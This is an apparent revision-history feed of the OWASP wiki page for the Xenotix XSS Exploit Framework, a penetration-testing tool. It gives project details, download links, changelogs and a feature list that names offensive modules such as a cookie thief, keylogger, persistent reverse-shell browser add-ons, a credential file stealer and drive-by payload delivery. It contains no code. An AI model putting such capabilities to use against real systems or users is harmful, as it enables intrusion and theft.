* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=182359</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=182359"/>
				<updated>2014-09-14T15:25:18Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]&lt;br /&gt;
MD5: 69b96d2a66f7dffeaa8a7c7926278042&lt;br /&gt;
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar&lt;br /&gt;
MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|loZSdedJnqc}}&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]			&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=182357</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=182357"/>
				<updated>2014-09-14T15:21:56Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: V6 Release Changes&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 6==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
